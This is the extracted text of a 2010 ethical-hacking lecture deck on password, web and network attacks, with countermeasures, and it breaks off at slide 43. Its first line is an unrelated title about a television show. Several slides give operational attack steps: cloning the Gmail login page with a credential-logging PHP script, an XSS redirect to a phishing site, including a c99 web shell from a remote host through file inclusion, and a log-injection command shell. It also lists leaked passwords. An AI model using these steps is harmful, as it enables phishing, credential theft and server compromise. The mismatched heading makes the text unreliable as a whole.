Powerpoint exploring the locations used in television show Time Clash
Ethical hacking & Information Security
1. Ethical
Hacking &
Information
Security
AK Dhamija
Introduction
Hacker
Ethical Hacking & Information Security
Password An Introduction
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures AK Dhamija
Web Hacking
Techniques
Countermeasures
DIPR, DRDO
Network
Hacking
Techniques
May 14, 2010
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 1 / 56
2. Ethical
Hacking &
Overview
Information
Security 1 Introduction
AK Dhamija Hacker
Introduction
2 Password Hacking
Hacker Low Tech Methods
Password
Hacking
High Tech Methods
Low Tech
Methods Countermeasures
High Tech
Methods 3 Web Hacking
Countermeasures
Web Hacking
Techniques
Techniques
Countermeasures
Countermeasures
Network 4 Network Hacking
Hacking
Techniques
Techniques
Countermeasures
Countermeasures
Windows
Hacking 5 Windows Hacking
Linux Hacking 6 Linux Hacking
Wireless 7 Wireless Hacking
Hacking
Malware
8 Malware
References
9 References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 2 / 56
3. Introduction
Ethical
Hacking &
Computer Security : CIA (Confidentiality, Integrity,
Information
Security Authentication)
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Computer Security
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 3 / 56
4. Introduction
Ethical
Hacking &
Computer Security : CIA (Confidentiality, Integrity,
Information
Security Authentication)
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Computer Security
Countermeasures
Network
Hacking
Network Security
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 4 / 56
5. Introduction
Ethical
Hacking &
Computer Security : CIA (Confidentiality, Integrity,
Information
Security Authentication)
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures Computer Security
Web Hacking
Techniques
Countermeasures Network Security
Network
Hacking
Techniques
Countermeasures
Information Security
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 5 / 56
6. Introduction
Ethical
Hacking &
Computer Security : CIA (Confidentiality, Integrity,
Information
Security Authentication)
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Computer Security
Web Hacking
Techniques
Countermeasures
Network Security
Network
Hacking Information Security
Techniques
Countermeasures
Windows
are OXYMORONS
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 6 / 56
7. Introduction
Ethical
Hacking &
Hacked Passwords
Information
Security
AK Dhamija Top ten most-popular passwords (in that order) from among 32
million hacked from RockYou.com
Introduction
Hacker 123456, 12345, 123456789, Password, iloveyou, princess, rockyou, 1234567, 12345678, abc123
Password
Hacking
Low Tech Imperva’s study of ”Consumer Password Worst Practices”
Methods
High Tech
Methods • About 30 percent of users chose passwords whose length is equal or below six characters.
Countermeasures
• Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
Web Hacking
Techniques • Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive
Countermeasures digits, adjacent keyboard keys, and so on)
Network
Hacking
Techniques Good Password Practices
Countermeasures
Windows • It should contain at least eight characters
Hacking
• It should contain a mix of four different types of characters - upper case letters, lower case letters,
Linux Hacking numbers, and special characters such as #$%&*,;” If there is only one letter or special character, it
should not be either the first or last character in the password.
Wireless
Hacking • It should not be a name, a slang word, or any word in the dictionary. It should not include any part
of your name or your e-mail address.
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 7 / 56
8. Introduction
Ethical
Hacking &
Hacked Passwords
Information
Security
AK Dhamija
Introduction
Hacker
Ditalee, Ditalee1, Ditalee3
Password
Hacking iambhiku
Low Tech
Methods pareekshanh84
High Tech
Methods
Countermeasures
*sha1973******
Web Hacking peter1
Techniques
Countermeasures hemant
Network love25786
Hacking
Techniques 080176
Countermeasures
Windows
kingoforkut
Hacking iloveyou
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 8 / 56
9. Introduction Hacker
Ethical
Hacking &
Hacker
Information
Security
AK Dhamija
What is a Hacker ?
Introduction
Hacker
Hacker
Password A hacker is someone who likes to tinker with electronics or computer
Hacking
Low Tech
systems : finding ways to make them do what they do better, or do
Methods
High Tech
things they weren’t intended to do
Methods
Countermeasures
Web Hacking Two types of Hacker
Techniques
Countermeasures
• White Hat :
Network
Hacking • Good Guys
Techniques • Don’t use their skills for illegal purposes
Countermeasures • Computer Security experts and help protect people from the Black Hats
Windows
Hacking • Black Hat :
Linux Hacking • Bad Guys
• Use their skills maliciously for personal gain
Wireless • Hack banks, steal credit cards, and deface websites
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 9 / 56
10. Introduction Hacker
Ethical
Hacking &
Hacker Hierarchy
Information
Security
AK Dhamija
Introduction Hacker Hierarchy
Hacker
Password • Script kiddies :
Hacking
Low Tech • Wannabe hackers
Methods • Have no hacking skills and use the tools developed by other hackers
High Tech
Methods
• No knowledge of what’s happening behind the scenes
Countermeasures
Web Hacking
• Intermediate hackers :
Techniques • Usually know about computers, networks, and have enough programming knowledge to
Countermeasures understand what a script might do
Network
• Use pre-developed well-known exploits (code that takes advantage of a bug or vulnerability)
Hacking to carry out attacks
Techniques
Countermeasures • Elite Hackers :
Windows • skilled hackers
Hacking • write hacker tools and exploits
• break into systems and hide their tracks
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 10 / 56
11. Introduction Hacker
Ethical
Hacking &
Becoming Hacker
Information
Security
AK Dhamija
Introduction
Hacker
What does it take to become a hacker?
Password
Hacking
Low Tech
Qualities needed
Methods
High Tech
Methods
• Creativity
Countermeasures
Web Hacking
• Will to learn
Techniques
Countermeasures • Knowledge is power
Network
Hacking • Patience
Techniques
Countermeasures
• Programming to be an elite hacker
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 11 / 56
12. Password Hacking Low Tech Methods
Ethical
Hacking &
Old Fashioned Low-Tech Methods
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking Low-Tech Methods
Low Tech
Methods
High Tech
• Social Engineering
Methods
Countermeasures
• Hacker takes advantage of trusting human beings to get information from them
• e.g. a ploy to install a new security update on your computer
Web Hacking
Techniques
Countermeasures
• Shoulder surfing
Network
Hacking
• Guessing
Techniques • Week Passwords like date of birth, phone number, favorite pet etc
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 12 / 56
13. Password Hacking High Tech Methods
Ethical
Hacking &
High Tech Methods
Information
Security
AK Dhamija
Introduction
Hacker High Tech Methods
Password
Hacking • Gmail system administrator’s automatic responder
Low Tech
Methods
High Tech • Dictionary Attacks
Methods
Countermeasures
• Brute Force Attacks
Web Hacking
Techniques
Countermeasures
• Rainbow Tables
Network
Hacking
• Phishing
Techniques
Countermeasures • GX Cookies
Windows
Hacking • ARP Poisoning
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 13 / 56
14. Password Hacking High Tech Methods
Ethical
Hacking &
Gmail system administrator’s automatic responder
Information
Security
AK Dhamija
Introduction High-Tech Techniques : Gmail system administrator’s automatic
Hacker
responder
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 14 / 56
15. Password Hacking High Tech Methods
Ethical
Hacking &
Gmail system administrator’s automatic responder
Information
Security
AK Dhamija
Introduction High-Tech Techniques : Gmail system administrator’s automatic
Hacker
responder
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 15 / 56
16. Password Hacking High Tech Methods
Ethical
Hacking &
Gmail system administrator’s automatic responder
Information
Security
AK Dhamija
High-Tech Techniques : Gmail system administrator’s automatic
Introduction
Hacker
responder
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 16 / 56
17. Password Hacking High Tech Methods
Ethical
Hacking &
Dictionary Attacks
Information
Security
AK Dhamija
Introduction
Hacker
High-Tech Techniques : Dictionary Attacks
Password • a text file full of commonly used passwords, or a list of every word from the dictionary is used against
Hacking a password database
Low Tech
Methods • Brutus, a very common password cracker
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 17 / 56
18. Password Hacking High Tech Methods
Ethical
Hacking &
Dictionary Attacks
Information
Security
AK Dhamija
High-Tech Techniques : Dictionary Attacks
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 18 / 56
19. Password Hacking High Tech Methods
Ethical
Hacking &
Dictionary Attacks
Information
Security
AK Dhamija High-Tech Techniques : Dictionary Attacks
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking IP Masquerading, Anonymous proxy and switching proxies are the
Malware techniques used to hide IP
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 19 / 56
20. Password Hacking High Tech Methods
Ethical
Hacking &
Brute-force Attacks
Information
Security
AK Dhamija
High-Tech Techniques : Brute-force Attacks
Introduction
Hacker • With time, brute-force attacks can crack any passwords
Password
Hacking
• Try every possible combination of letters, numbers, and special characters until the right password is
found .
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 20 / 56
21. Password Hacking High Tech Methods
Ethical
Hacking &
Brute-force Attacks
Information
Security
AK Dhamija
High-Tech Techniques : Brute-force Attacks
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 21 / 56
22. Password Hacking High Tech Methods
Ethical
Hacking &
Brute-force Attacks
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking High-Tech Techniques : Rainbow Tables
Low Tech
Methods
High Tech
• A huge pre-computed list of hash values for every possible combination of characters
Methods
Countermeasures
• A hash is a one way encryption - MD5
Web Hacking • cheese through the md5 algorithm, would be fea0f1f6fede90bd0a925b4194deac11
Techniques
Countermeasures • Having huge tables of every possible character combination hashed is a much better alternative to
brute-force cracking
Network
Hacking • Once the rainbow tables are created, cracking the password is a hundred times faster than
Techniques brute-forcing it
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 22 / 56
23. Password Hacking High Tech Methods
Ethical
Hacking &
Phishing
Information
Security
AK Dhamija
Introduction
Hacker
Password High-Tech Techniques : Phishing
Hacking
Low Tech • Stealing sensitive information, such as usernames, passwords, and bank information, by pretending to
Methods be someone you’re not
High Tech
Methods
Countermeasures
• First the hacker chooses a target (Hotmail and Gmail)
Web Hacking • Go to www.gmail.com and click File − > Save page as ...
Techniques
Countermeasures
• Rename ServiceLogin.htm to index.htm
Network • PHP script that logs and stores your login details when you click ”Sign in”
Hacking
Techniques
• Save this script into the same directory as you saved the Gmail page, and name it phish.php
Countermeasures
• Create a new empty text file and name it list.txt
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 23 / 56
24. Password Hacking High Tech Methods
Ethical
Hacking &
Phishing
Information
Security
AK Dhamija High-Tech Techniques : Phishing
PHP Script
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 24 / 56
25. Password Hacking High Tech Methods
Ethical
Hacking &
Phishing
Information
Security
AK Dhamija
High-Tech Techniques : Phishing
Introduction
Hacker
• open up the main Gmail page named index.htm with notepad
Password • Look for first occurrence of the word ”action” in the script
Hacking
Low Tech
Methods
High Tech • There are two ”action” occurrences in the script so make sure you have the right one by looking at
Methods the ”form id” name above
Countermeasures
Web Hacking
• Change the link between action = ” ” to phish.php. This will make the form submit to your PHP
phish script instead of to Google
Techniques
Countermeasures
Network
• After the link you will see the code
Hacking • Change the word ”POST” to ”GET” so that it looks like method=”GET”. This submits the
Techniques information you type so that the PHP script can log it
Countermeasures
Windows
• Save and close the file
Hacking • Upload the files up to a free webhost that supports PHP
Linux Hacking • change file permission of ”list.txt” to 777
Wireless
Hacking
• http://www.yourwebhosturl.com/youraccount/list.txt will give you the username and password
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 25 / 56
26. Password Hacking High Tech Methods
Ethical
Hacking &
Phishing
Information
Security
AK Dhamija
High-Tech Techniques : Phishing
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 26 / 56
27. Password Hacking High Tech Methods
Ethical
Hacking &
GX Cookies
Information
Security
AK Dhamija
Introduction
Hacker High-Tech Techniques : GX Cookies
Password
Hacking
• Cookies are used by web browsers to store your user information so that you can stay logged into a
website even after you leave. By stealing your cookie, the attacker can sometimes login without
Low Tech
Methods knowing your password
High Tech
Methods • When Users login into Gmail account, Gmail Server sends Cookie (A text file) to your browser
Countermeasures
• This file helps Gmail server to know that you are authenticated. This Cookie will log-in you in for 2
Web Hacking week unless you press sign-out or delete the Cookie
Techniques
Countermeasures • Even though when you authenticated using SSL, after that you are also not secure because the result
return by the Gmail server is unencrypted connection.
Network
Hacking • Every time you request anything from the Gmail server like an image, your browser sends this Cookie
Techniques file to Gmail server and any attacker can easily get this Cookie file by applying any network sniffer
Countermeasures tool
Windows
Hacking
• After this attacker get your Gmail session ID and using this Session ID attacker can easily logged in
your Gmail account without the need of any Username and Password
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 27 / 56
28. Password Hacking High Tech Methods
Ethical
Hacking &
GX Cookies
Information
Security
AK Dhamija
High-Tech Techniques : GX Cookies
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 28 / 56
29. Password Hacking High Tech Methods
Ethical
Hacking &
ARP Poisoning
Information
Security
AK Dhamija
Introduction
Hacker High-Tech Techniques : ARP Poisoning
Password
Hacking
• Address Resolution Protocol (ARP) is a Layer 2 protocol
Low Tech
Methods
• Allows an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the
High Tech traffic altogether
Methods
Countermeasures • the aim is to associate the attacker’s MAC address with the IP address of another node (such as the
default gateway)
Web Hacking
Techniques • Any traffic meant for that IP address would be mistakenly sent to the attacker instead.
Countermeasures
• The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing)
Network or modify the data before forwarding it (man-in-the-middle attack)
Hacking
Techniques • The attacker could also launch a denial-of-service attack against a victim by associating a
Countermeasures nonexistent MAC address to the IP address of the victim’s default gateway
Windows • ARP spoofing attacks can be run from a compromised host, or from an attacker’s machine that is
Hacking connected directly to the target Ethernet segment
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 29 / 56
30. Password Hacking High Tech Methods
Ethical
Hacking &
ARP Poisoning
Information
Security
AK Dhamija
High-Tech Techniques : ARP Poisoning
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 30 / 56
31. Password Hacking Countermeasures
Ethical
Hacking &
Password Hacking
Information
Security
AK Dhamija
Countermeasures
Introduction Social Engineering
Hacker
• Ask some questions that he should be able to answer to establish his legitimacy.
Password
Hacking • Some professionals study the company before attacking, so they might know all the answers.
Low Tech
Methods • In case of doubts, you should ask the head of whatever department the attacker is from
High Tech
Methods
Countermeasures Shoulder Surfing
Web Hacking • Make sure there is no one behind you attempting to peak
Techniques
Countermeasures • Don’t keep any sticky notes laying around that have your password or password hints on them
Network
Hacking Guessing
Techniques
Countermeasures • Never use a password like your birth date, your mother’s maiden name, your pets name, your
spouse’s name, or anything that someone may be able to guess
Windows
Hacking
Gmail system administrator’s automatic responder
Linux Hacking
• Don’t fall prey to such tatics
Wireless
Hacking • Don’t respond to mails, if you can’t identify the sender
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 31 / 56
32. Password Hacking Countermeasures
Ethical
Hacking &
Password Hacking
Information
Security
AK Dhamija
Countermeasures
Introduction Dictionary Attacks
Hacker
• Don’t use a password that is in the dictionary
Password
Hacking • If you use a word from the dictionary but replace most of the letters with a number, you are not safe.
Low Tech 1337 speak dictionary is changing a word like ”animal” to 4n1m41
Methods
High Tech • Use something like doyoulikecheese?88
Methods
Countermeasures
Brute-force Attacks
Web Hacking
Techniques • Creating a very long password and using many numbers and odd characters
Countermeasures
• Creating a phrase for your password is your best option for staying secure
Network
Hacking
Techniques Rainbow Tables
Countermeasures
• Creating tables for passwords that are long takes a very long time and a lot of resources
Windows
Hacking
Phishing
Linux Hacking
• Beware of gmail.randomsite.com, or gamilmail.com
Wireless
Hacking • When you are on the real Gmail website, the URL should begin with www.google.com anything else
is a fake
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 32 / 56
33. Password Hacking Countermeasures
Ethical
Hacking &
Password Hacking
Information
Security
AK Dhamija
Introduction
Hacker
Password Countermeasures
Hacking
Low Tech
GX Cookies
Methods
High Tech • Do not use Gmail from public places, cybercaf´ and public wireless hotspots
e
Methods
Countermeasures • Always use https://mail.google.com because this will access the SSL version of Gmail. it will be
persistent over your entire session and not only during authentication
Web Hacking
Techniques
Countermeasures ARP Poisoning
Network • Static ARP inspection (SARPI) or dynamic ARP inspection (DARPI) approach on switched or
Hacking hubbed LANs with or without DHCP
Techniques
Countermeasures • Always use https://mail.google.com because this will access the SSL version of Gmail. it will be
persistent over your entire session and not only during authentication
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 33 / 56
34. Password Hacking Countermeasures
Ethical
Hacking &
Password Cracking
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking
Other Programs
Low Tech
Methods
High Tech
• Cain and Abel
Methods
Countermeasures • John the Ripper
Web Hacking
Techniques • THC Hydra
Countermeasures
Network • SolarWinds
Hacking
Techniques
Countermeasures
• RainbowCrack
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 34 / 56
35. Web Hacking
Ethical
Hacking &
Web Hacking
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods Techniques
High Tech
Methods
Countermeasures • Cross Site Scripting (XSS)
Web Hacking • Remote File Inclusion (RFI)
Techniques
Countermeasures
• Local File Inclusion (RFI)
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 35 / 56
36. Web Hacking Techniques
Ethical
Hacking &
Web Hacking
Information
Security
AK Dhamija Cross Site Scripting (XSS)
Introduction
• User inputs malicious data into a website
Hacker
• Affected Sites FBI, CNN, Ebay, Apple, Microsft, and AOL
Password
Hacking • features commonly vulnerable to XSS attacks are
Low Tech
Methods
• Search Engines
High Tech
• Login Forms
Methods • Comment Fields
Countermeasures
Web Hacking
• Three types of XSS attacks
Techniques • Local
Countermeasures
• Rarest & hardest to pull off
Network • Requires an exploit for a browser
Hacking • hacker can install worms, spambots, and backdoors onto your computer
Techniques
Countermeasures • Non-Persistent
Windows
• most common types of attack and don’t harm the actual website
Hacking
• A client side script or HTML is inserted into a variable which causes the output that
the user sees to be changed
Linux Hacking
• Only activated when the user visits the URL crafted by the attacker
Wireless • Persistent
Hacking • Steal website cookies
• Deface the website
Malware • Spread Worms
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 36 / 56
37. Web Hacking Techniques
Ethical
Hacking &
Cross Site Scripting (XSS)
Information
Security
AK Dhamija
XSS : How can we say whether the site is vulnerable
• If there is a search field, enter a word and if that word is displayed back to you on the next page,
there’s a chance it is vulnerable
Introduction
Hacker • Search for < h1 > hi < /h1 >, and if the word ”hi” is outputted as a big header, it is vulnerable
Password • Search for < script > alert(”hi”); < /script > , if the word ”hi” pops up in a popup box,
Hacking then the site is vulnerable to XSS
Low Tech • These examples are non-persistent. Now if the hacker finds a guestbook etc, he can make it
Methods persistent and everyone that visits the page would get the above alert if that was part of his comment
High Tech
Methods
Countermeasures
Web Hacking
XSS for Phishing
Techniques We want to craft a link pointing to the legit website (www.victim-site.com) that redirects to phishing website
Countermeasures
• when JavaScript is inserted into the search box, a URL was formed that looked like
Network
Hacking
Techniques
Countermeasures
• the code we typed into the search box was passed to the ”searchbox” variable
• Replace everything in between ?searchbox= and &search with JavaScript code
Windows < script > window.location = ”http : //phishing − site.com” < /script >
Hacking
• Now when you go to the finished link, the legitimate site will redirect to the phishing website.
Linux Hacking • Encode the URL to make it look more legit - http://www.encodeurl.com/
Wireless • It may look something like
Hacking http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+
%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
Malware •
Once the victim sees that the link points to the legitimate website, he will be more likely to fall for
References the phishing attack
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 37 / 56
38. Web Hacking Techniques
Ethical
Hacking &
Remote File Inclusion (RFI)
Information
Security
AK Dhamija
RFI : How can we say whether the site is vulnerable
• A remote file, usually a shell is included into a website which allows the hacker to execute server side
Introduction commands as the current logged on user, and have access to files on the server
Hacker • Many servers are vulnerable to this kind of attack because of PHP’s default settings of
register globals and allow url fopen being enabled
Password
Hacking • PHP 6.0 onwards, register globals has been depreciated
Low Tech
Methods
High Tech
Methods RFI : Exploiting the vulnerability
Countermeasures
• First the hacker would find a website that gets its pages via the PHP include() function and is
Web Hacking vulnerable to RFI.
Techniques
Countermeasures
• Many hackers use Google dorks to locate servers vulnerable to RFI.
Network
• A Google dork is the act of using Google’s provided search tools to help get a specific search result.
eg allinurl : .php?page = looks for URL’s with .php?page = in them
Hacking
Techniques
• To get relevant sites, Switch around the word ”page” with other letters and similar words
Countermeasures • Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI
vulnerabilities in site content management systems and search for websites that are running that
Windows
vulnerable web application with a Google dork
Hacking
• Website that include pages have a navigation system similar to:
Linux Hacking http : //target − site.com/index.php?page = P ageN ame
Wireless • To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like
Hacking http : //target − site.com/index.php?page = http : //google.com
Malware
• If the Google homepage shows up on the website, then the hacker knows the website is vulnerable
and would continue to include a shell
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 38 / 56
39. Web Hacking Techniques
Ethical
Hacking &
Remote File Inclusion (RFI)
Information
Security
AK Dhamija
RFI : Exploiting the vulnerability
• Most popular shells are c99 and r57. A hacker would either upload them to a remote server or just
use a Google dork to locate them already online and insert them (search inurl:c99.txt)
Introduction
Hacker • This will display many websites with the shell already up and ready to be included. At the end of the
URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and
Password not cause any problems.
Hacking
Low Tech
• The new URL with the shell included would look like
Methods http : //target − site.com/index.php?page = http : //site.com/c99.txt?
High Tech
Methods
• Sometimes the PHP script on the server appends ”.php” but ”c99.txt.php” would not work.
Countermeasures • To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to
ignore everything after c99.txt
Web Hacking
Techniques • If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 39 / 56
40. Web Hacking Techniques
Ethical
Hacking &
Remote File Inclusion (RFI)
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech RFI : Exploiting the vulnerability
Methods
High Tech • The shell will display information about the remote server and list all the files and directories on it.
Methods
Countermeasures • From here the hacker would find a directory that has read and write privileges
Web Hacking
• Upload the shell as a .php file so that incase the vulnerability is fixed, he will be able to access it
later on
Techniques
Countermeasures • Root privileges become vulnerable now by uploading and running local exploits against the server
Network • He could also search the victim server for configuration files. These files may contain username and
Hacking passwords for the MYSQL databases etc
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 40 / 56
41. Web Hacking Techniques
Ethical
Hacking &
Local File Inclusion (LFI)
Information
Security
AK Dhamija
LFI : How can we say whether the site is vulnerable
• when you have the ability to browse through the server by means of directory transversal (discover
the /etc/passwd file)
Introduction
Hacker • Vulnerable sites are found similar ti RFI
(www.target − site.com/index.php?p = ../../../../../../../etc/passwd)
Password
Hacking • /etc/passwd file would display each line as username:passwd:UserID:GroupID:full name:directory:shell
Low Tech • eg Root:x:0:0::/root:/bin/bash
Methods
High Tech • If the password hash was shown, the hacker would be able to crack it and get access to the machine
Methods
Countermeasures
• if password is shadowed and in the /etc/shadow file which the hacker doesn’t have access to, then
he may get access to the system through log injection
Web Hacking • The log directories are located in different areas in different Linux distributions (find error.log,
Techniques access.log, error log, access log etc)
Countermeasures
Network
Hacking LFI : Gaining access to the system through log injection
Techniques
Countermeasures • Search for OS version the target server then search where the log files are located on that OS
Windows • The hacker would then inject some PHP code into the logs by typing
Hacking <? P assthru($ GET [ cmd ]) ? > after = in the URL
Linux Hacking
• This will cause the PHP script to be logged because there is no file by that name. This script will
give the hacker shell access and allow him to execute system commands
Wireless • if you go back to the log file, you will see that PHP script wasn’t parsed and instead converted to
Hacking %3C?%20passthru($ GET [cmd])%20?%3E
Malware • When we submitted the script, the browser automatically encoded the URL. We can use a pearl
script that can get around this problem.
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 41 / 56
42. Web Hacking Techniques
Ethical
Hacking &
Local File Inclusion (LFI)
Information
Security
AK Dhamija LFI : Gaining access to the system through log injection
• Edit the variables: site,path, code, andlog to the appropriate information
Introduction • Once the hacker runs this script and it goes successfully, he can run any command on the server.
Hacker
• From here he can run any local exploits to gain root, or just browse the server files
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 42 / 56
43. Web Hacking Countermeasures
Ethical
Hacking &
Web Hacking
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Countermeasures
• Make sure you are using up-to-date scripts
Web Hacking
